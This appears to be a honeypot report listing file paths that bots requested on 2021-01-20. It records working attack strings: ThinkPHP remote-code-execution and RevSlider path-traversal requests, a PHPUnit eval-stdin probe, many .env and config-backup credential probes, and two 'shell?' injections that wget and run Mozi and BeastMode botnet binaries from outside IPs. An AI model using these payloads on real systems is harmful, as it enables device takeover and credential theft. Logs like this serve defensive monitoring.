File Access Bruteforce Attempts for 2021-01-20

Share on:

Last Updated: 21:01 GMT+8

  • %20phishingdomains
  • .env
  • .git/config
  • 101.39.232.12
  • 72.21.91.29/
  • CVE-2008-1054/
  • CVE-2008-4801/
  • actuator/health
  • admin/.env
  • api/.env
  • blog/.env
  • c/version.js
  • catalogsearch/result/?cat=3&q=Charity
  • client_area/
  • clientaccesspolicy.xml
  • config/getuser?index=0
  • console/
  • favicon.ico
  • hudson
  • index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP21
  • jenkins/login
  • laravel/.env
  • login
  • manager/html
  • manager/html/
  • owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
  • phishingdomains-2020-11-16/
  • phpmyadmin/
  • port10005-2020-11-21/
  • public/.env
  • shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws
  • shell?cd+/tmp;rm+-rf+*;wget+http://84.232.53.219:60288/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
  • shop/.env
  • sites/.env
  • solr/admin/info/system?wt=json
  • stalker_portal/c/
  • stalker_portal/c/version.js
  • streaming/clients_live.php
  • system/.env
  • system_api.php
  • test/.env
  • vendor/.env
  • vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • wp-admin/config.bak.php
  • wp-content/config.bak.php
  • wp-content/plugins/apikey/apikey.php
  • wp-content/plugins/apikey/cursed.php
  • wp-content/plugins/downloads-manager/img/unlock.gif
  • wp-content/plugins/ioptimization/IOptimize.php?rchk
  • wp-content/plugins/wp-file-manager/readme.txt
  • wp-includes/config.bak.php
  • wp-includes/css/css.php
  • wp-includes/fonts/css.php
  • wp-login.php